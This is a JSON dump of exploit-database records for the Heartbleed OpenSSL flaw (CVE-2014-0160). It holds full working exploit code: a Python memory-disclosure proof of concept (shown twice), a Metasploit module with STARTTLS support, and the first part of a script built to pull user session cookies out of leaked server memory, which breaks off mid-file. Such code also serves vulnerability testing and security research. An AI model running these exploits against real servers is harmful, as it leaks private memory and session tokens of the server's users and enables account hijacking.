(Multiple SSLTLS Versions)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "href": "", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\n# Date: [2014-04-09]\n# Exploit Author: [Csaba Fitzl]\n# Vendor Homepage: [http://www.openssl.org/]\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\n# Version: [1.0.1f]\n# Tested on: [N/A]\n# CVE : 
[2014-0160]\n\n\n#!/usr/bin/env python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\n\nversion = []\nversion.append(['SSL 3.0','03 00'])\nversion.append(['TLS 1.0','03 01'])\nversion.append(['TLS 1.1','03 02'])\nversion.append(['TLS 1.2','03 03'])\n\ndef create_hello(version):\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\treturn hello\n\ndef create_hb(version):\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\n\treturn hb\n\ndef hexdump(s):\n\tfor b in xrange(0, len(s), 16):\n\t\tlin = [c for c in s[b : b + 16]]\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\n\tprint\n\ndef recvall(s, length, timeout=5):\n\tendtime = time.time() + timeout\n\trdata = ''\n\tremain = length\n\twhile remain > 0:\n\t\trtime = endtime - time.time()\n\t\tif rtime < 0:\n\t\t\treturn None\n\t\tr, w, e = select.select([s], [], [], 5)\n\t\tif s in r:\n\t\t\tdata = s.recv(remain)\n\t\t\t# EOF?\n\t\t\tif not data:\n\t\t\t\treturn None\n\t\t\trdata += data\n\t\t\tremain -= len(data)\n\treturn rdata\n\n\ndef recvmsg(s):\n\thdr = recvall(s, 5)\n\tif hdr is None:\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\n\t\treturn None, None, None\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\n\tpay = recvall(s, ln, 10)\n\tif pay is None:\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\n\t\treturn None, None, None\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n\treturn typ, ver, pay\n\ndef hit_hb(s,hb):\n\ts.send(hb)\n\twhile True:\n\t\ttyp, ver, pay = recvmsg(s)\n\t\tif typ is None:\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\n\t\t\treturn False\n\n\t\tif typ == 24:\n\t\t\tprint 'Received heartbeat response:'\n\t\t\thexdump(pay)\n\t\t\tif len(pay) > 3:\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\n\t\t\telse:\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\n\t\t\treturn True\n\n\t\tif typ == 21:\n\t\t\tprint 'Received alert:'\n\t\t\thexdump(pay)\n\t\t\tprint 'Server returned error, likely not vulnerable'\n\t\t\treturn False\n\ndef main():\n\topts, args = options.parse_args()\n\tif len(args) < 1:\n\t\toptions.print_help()\n\t\treturn\n\tfor i in range(len(version)):\n\t\tprint 'Trying ' + version[i][0] + '...'\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tprint 'Connecting...'\n\t\tsys.stdout.flush()\n\t\ts.connect((args[0], opts.port))\n\t\tprint 'Sending 
Client Hello...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hello(version[i][1]))\n\t\tprint 'Waiting for Server Hello...'\n\t\tsys.stdout.flush()\n\t\twhile True:\n\t\t\ttyp, ver, pay = recvmsg(s)\n\t\t\tif typ == None:\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\n\t\t\t\treturn\n\t\t\t# Look for server hello done message.\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\n\t\t\t\tbreak\n\n\t\tprint 'Sending heartbeat request...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hb(version[i][1]))\n\t\tif hit_hb(s,create_hb(version[i][1])):\n\t\t\t#Stop if vulnerable\n\t\t\tbreak\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-01-03T21:23:15", "description": "This Metasploit module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "zdt", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22129", "href": "https://0day.today/exploit/description/22129", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n CIPHER_SUITES = [\r\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\r\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\r\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\r\n 0x0038, # 
TLS_DHE_DSS_WITH_AES_256_CBC_SHA\r\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\r\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\r\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\r\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\r\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\r\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\r\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\r\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\r\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\r\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\r\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\r\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\r\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\r\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\r\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\r\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\r\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\r\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\r\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\r\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\r\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\r\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\r\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0008, # 
TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\r\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\r\n 0x00ff # Unknown\r\n ]\r\n\r\n HANDSHAKE_RECORD_TYPE = 0x16\r\n HEARTBEAT_RECORD_TYPE = 0x18\r\n ALERT_RECORD_TYPE = 0x15\r\n TLS_VERSION = {\r\n '1.0' => 0x0301,\r\n '1.1' => 0x0302,\r\n '1.2' => 0x0303\r\n }\r\n\r\n TTLS_CALLBACKS = {\r\n 'SMTP' => :tls_smtp,\r\n 'IMAP' => :tls_imap,\r\n 'JABBER' => :tls_jabber,\r\n 'POP3' => :tls_pop3\r\n }\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\r\n 'Description' => %q{\r\n This module implements the OpenSSL Heartbleed attack. The problem\r\n exists in the handling of heartbeat requests, where a fake length can\r\n be used to leak memory data in the response. Services that support\r\n STARTTLS may also be vulnerable.\r\n },\r\n 'Author' => [\r\n 'Neel Mehta', # Vulnerability discovery\r\n 'Riku', # Vulnerability discovery\r\n 'Antti', # Vulnerability discovery\r\n 'Matti', # Vulnerability discovery\r\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. 
This module is based on it.\r\n 'FiloSottile', # PoC site and tool\r\n 'Christian Mehlmauer', # Msf module\r\n 'wvu', # Msf module\r\n 'juan vazquez' # Msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0160'],\r\n ['US-CERT-VU', '720951'],\r\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],\r\n ['URL', 'http://heartbleed.com/'],\r\n ['URL', 'https://github.com/FiloSottile/Heartbleed'],\r\n ['URL', 'https://gist.github.com/takeshixx/10107280'],\r\n ['URL', 'http://filippo.io/Heartbleed/']\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2014',\r\n 'License' => MSF_LICENSE\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),\r\n OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def tls_smtp\r\n # https://tools.ietf.org/html/rfc3207\r\n sock.get_once\r\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\")\r\n res = sock.get_once\r\n\r\n unless res && res =~ /STARTTLS/\r\n return nil\r\n end\r\n sock.put(\"STARTTLS\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_imap\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"a001 CAPABILITY\\r\\n\")\r\n res = sock.get_once\r\n unless res && res =~ /STARTTLS/i\r\n return nil\r\n end\r\n sock.put(\"a002 STARTTLS\\r\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_pop3\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"CAPA\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/ || res !~ /STLS/\r\n return nil\r\n end\r\n sock.put(\"STLS\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? 
|| res =~ /^-/\r\n return nil\r\n end\r\n res\r\n end\r\n\r\n def tls_jabber\r\n # http://xmpp.org/extensions/xep-0035.html\r\n msg = \"<?xml version='1.0' ?>\"\r\n msg << \"<stream:stream xmlns='jabber:client' \"\r\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\r\n msg << \"version='1.0' \"\r\n msg << \"to='#{datastore['XMPPDOMAIN']}'>\"\r\n sock.put(msg)\r\n res = sock.get\r\n if res.nil? || res =~ /stream:error/ || res !~ /starttls/i\r\n print_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/\r\n return nil\r\n end\r\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\r\n sock.put(msg)\r\n sock.get_once\r\n end\r\n\r\n def run_host(ip)\r\n connect\r\n\r\n unless datastore['STARTTLS'] == 'None'\r\n vprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\")\r\n res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])\r\n if res.nil?\r\n vprint_error(\"#{peer} - STARTTLS failed...\")\r\n return\r\n end\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Client Hello...\")\r\n sock.put(client_hello)\r\n\r\n server_hello = sock.get\r\n unless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE\r\n vprint_error(\"#{peer} - Server Hello Not Found\")\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Heartbeat...\")\r\n heartbeat_length = 16384\r\n sock.put(heartbeat(heartbeat_length))\r\n hdr = sock.get_once(5)\r\n if hdr.blank?\r\n vprint_error(\"#{peer} - No Heartbeat response...\")\r\n return\r\n end\r\n\r\n unpacked = hdr.unpack('Cnn')\r\n type = unpacked[0]\r\n version = unpacked[1] # must match the type from client_hello\r\n len = unpacked[2]\r\n\r\n # try to get the TLS error\r\n if type == ALERT_RECORD_TYPE\r\n res = sock.get_once(len)\r\n alert_unp = res.unpack('CC')\r\n alert_level = alert_unp[0]\r\n alert_desc = alert_unp[1]\r\n msg = \"Unknown error\"\r\n # http://tools.ietf.org/html/rfc5246#section-7.2\r\n case alert_desc\r\n when 
0x46\r\n msg = \"Protocol error. Looks like the chosen protocol is not supported.\"\r\n end\r\n print_error(\"#{peer} - #{msg}\")\r\n disconnect\r\n return\r\n end\r\n\r\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]\r\n vprint_error(\"#{peer} - Unexpected Heartbeat response\")\r\n disconnect\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\")\r\n heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...\r\n if heartbeat_data\r\n print_good(\"#{peer} - Heartbeat response with leak\")\r\n report_vuln({\r\n :host => rhost,\r\n :port => rport,\r\n :name => self.name,\r\n :refs => self.references,\r\n :info => \"Module #{self.fullname} successfully leaked info\"\r\n })\r\n vprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\")\r\n else\r\n vprint_error(\"#{peer} - Looks like there isn't leaked information...\")\r\n end\r\n end\r\n\r\n def heartbeat(length)\r\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\r\n payload << [length].pack(\"n\") # Payload Length: 16384\r\n\r\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\r\n end\r\n\r\n def client_hello\r\n # Use current day for TLS time\r\n time_temp = Time.now\r\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\r\n\r\n hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS\r\n hello_data << [time_epoch].pack(\"N\") # Time in epoch format\r\n hello_data << Rex::Text.rand_text(28) # Random\r\n hello_data << \"\\x00\" # Session ID length\r\n hello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102)\r\n hello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites\r\n hello_data << \"\\x01\" # Compression methods length (1)\r\n hello_data << \"\\x00\" # Compression methods: null\r\n\r\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\r\n hello_data_extensions << 
\"\\x00\\x01\" # Extension length\r\n hello_data_extensions << \"\\x01\" # Extension data\r\n\r\n hello_data << [hello_data_extensions.length].pack(\"n\")\r\n hello_data << hello_data_extensions\r\n\r\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\r\n data << [hello_data.length].pack(\"n\") # Length\r\n data << hello_data\r\n\r\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\r\n end\r\n\r\n def ssl_record(type, data)\r\n record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')\r\n record << data\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/22129", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-03T01:40:21", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server 
[options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n 
sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://0day.today/exploit/22122", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T02:43:51", "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default:
443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n 
